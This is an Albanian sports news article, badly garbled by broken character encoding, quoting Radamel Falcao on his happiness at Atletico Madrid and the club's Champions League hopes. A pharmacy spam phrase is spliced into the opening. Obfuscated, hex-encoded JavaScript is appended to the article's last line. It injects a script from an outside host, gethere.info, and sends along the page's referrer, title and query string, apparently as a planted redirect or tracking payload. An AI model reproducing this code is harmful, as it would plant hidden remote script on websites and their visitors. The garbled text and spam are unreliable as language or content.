falcao-atlmadrid

Falcao: I lumtur te Atletico, jam nA� formA� tA� mirA�

metronidazole over the counter canada. Radamel Falcao A�shtA� i lumtur qA� bA�n pjesA� nA� njA� ekip si Atletico i Madridit. Bomberi kolumbian shprehet i kA�naqur me ecurinA� e skuadrA�s sA� tij nA� La LigA� pA�r kA�tA� sezon dhe beson se bardhekuqtA� do ta��a realizojnA� synimin e tyre pA�r ta��u kualifikuar nA� Champios League vitin e ardhshA�m. MegjithatA� 26-vjecari pohon se A�shtA� ende herA�t pA�r tA� folur pA�r titullin nA� kampionatin spanjoll.

a�?Ecuaria jonA� deri nA� kA�to momente A�shtA� e jashtA�zakonshme. Po kalojmA� njA� periudhA� shumA� tA� mirA� por bA�jmA� mirA� qA� tA� qA�ndrojmA� me kA�mbA� nA� tokA�. A�shtA� ende herA�t pA�r tA� folur pA�r titullin nA� kampionat. Prioriteti ynA� A�shtA� qA� tA� shkojmA� nA� Champios League, mA� pas do tA� shohim se ku do arrijmA�.a�?

a�?El Tigrea�? pranoi sA� ndihet nA� formA� tA� shkA�lqyer fizike dhe se A�shtA� i kA�naqur me atA� cfarA� ka arritur deri nA� kA�to momente, por tA� shA�nuarit gjithmonA� nuk pA�rbA�n njA� fiksim pA�r tA�.

a�?Jam i lumtur me mA�nyrA�n sesi ka filluar ky sezon dhe mA� atA� cfarA� po bA�j, por mbi tA� gjitha jam i lumtur mA� faktin se golat e mi ndihmojnA� skuadrA�n. Ndihem mirA� dhe shpresoj tA� vazhdojA� gjatA� mA� kA�tA� perfromancA�. Nuk jam i fiksuar me numrin e golave qA� duhet tA� shA�noj pasi e rA�ndA�sishme A�shtA� qA� ekipi tA� fitoj trofe dhe cdo tjetA�r A�shtA� dytA�sore pA�r mua.a�?

Falcao gjithashtu shtoi se nuk mendon pA�r titullin a�?Pichichia�?, ose ndryshe golashA�nuesi mA� i mirA� i La Ligas.

a�?MA� gA�zon fakti qA� bA�j pjesA� tek golashA�nuesit mA� tA� mirA� tA� kampionatit spanjoll por nuk jam i pA�rqA�ndruar tek dicka e tillA�.a�?

NA� pA�rfudim sulmuesi theksoi se A�shtA� i lumtur tek Atletic Madridit dhe se pA�r momentin nuk mendon pA�r tjetA�r skuadA�r.

a�?Ndihem mirA� tek Atletic dhe jam krenar qA� ndodhem kA�tu. Kam edhe tre vite tA� tjera kontratA� pavarsisht se ka persona qA� flasin pA�r njA� largim timin nA� fund tA� kA�tij sezoni. Jam i lidhur me kA�tA� klub dhe objektivi im A�shtA� qA� ta��a ndihmoj pA�r tA� shkuar sa mA� lart.a�?

Atletico Madridit ndodhet nA� vendin e dytA� nA� La Liga me 28 pikA�, vetA�m tre mA� pakA� se kryesuesit e BarcelonA�s.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}